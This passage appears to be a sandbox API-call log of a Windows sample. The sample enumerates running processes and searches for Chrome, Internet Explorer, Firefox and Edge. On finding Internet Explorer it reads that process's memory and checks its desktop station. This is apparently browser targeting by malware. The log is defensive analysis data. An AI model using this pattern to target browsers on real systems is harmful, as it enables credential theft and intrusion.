	[0196.035] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0196.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1094
	[0196.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.036] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.036] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.036] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.037] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.037] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1098
	[0196.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.038] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.038] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.038] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.039] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.039] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x109c
	[0196.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.040] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.040] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.040] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.041] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0196.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x10a0
	[0196.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.042] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0196.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.042] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.042] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0196.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.043] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0196.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x10a4
	[0196.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.044] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0196.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.044] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.044] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0196.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.045] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.045] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0196.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x10a8
	[0196.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.051] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.052] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.052] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.052] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.053] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0196.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x10ac
	[0196.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.053] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0196.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.054] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.054] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0196.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.054] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.054] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0196.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0196.055] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0196.056] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x10b0
	[0196.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.056] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0196.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.056] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.057] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0196.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.058] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.058] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0196.059] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x10b4
	[0196.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.059] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0196.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.059] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.059] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0196.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.060] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.060] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0196.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x10b8
	[0196.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.061] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0196.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.061] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.061] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0196.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.062] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.062] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0196.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x10bc
	[0196.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.063] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0196.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.063] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.063] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0196.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.064] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.064] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0196.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x10c0
	[0196.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.065] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0196.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.065] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.066] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0196.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.066] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.067] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0196.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x10c4
	[0196.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.067] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0196.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.068] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.068] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0196.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.068] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.068] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0196.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x10c8
	[0196.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.069] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0196.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.069] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.070] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0196.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.070] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.071] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0196.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x10cc
	[0196.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.071] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0196.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.072] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.072] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0196.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.073] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.073] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0196.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x10d0
	[0196.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.074] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0196.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.074] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.074] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0196.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.075] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.075] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0196.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x10d4
	[0196.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.076] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0196.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.076] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.076] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0196.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.076] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.077] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0196.078] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x10d8
	[0196.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.078] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0196.078] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.078] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.079] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0196.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.079] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.079] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0196.080] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x10dc
	[0196.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.080] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0196.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.081] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.081] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0196.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.082] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0196.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x10e0
	[0196.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.083] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0196.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.084] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.084] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0196.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.085] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.085] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0196.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x10e4
	[0196.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.086] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0196.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.086] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.087] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0196.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.087] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.088] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0196.089] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x10e8
	[0196.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.089] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0196.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.089] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.090] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0196.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.090] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x10ec
	[0196.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.092] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.092] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.135] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.135] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.135] NtQueryInformationProcess (in: ProcessHandle=0x10ec, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.135] ReadProcessMemory (in: hProcess=0x10ec, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.136] ReadProcessMemory (in: hProcess=0x10ec, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.136] ReadProcessMemory (in: hProcess=0x10ec, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.136] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.136] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x10f0
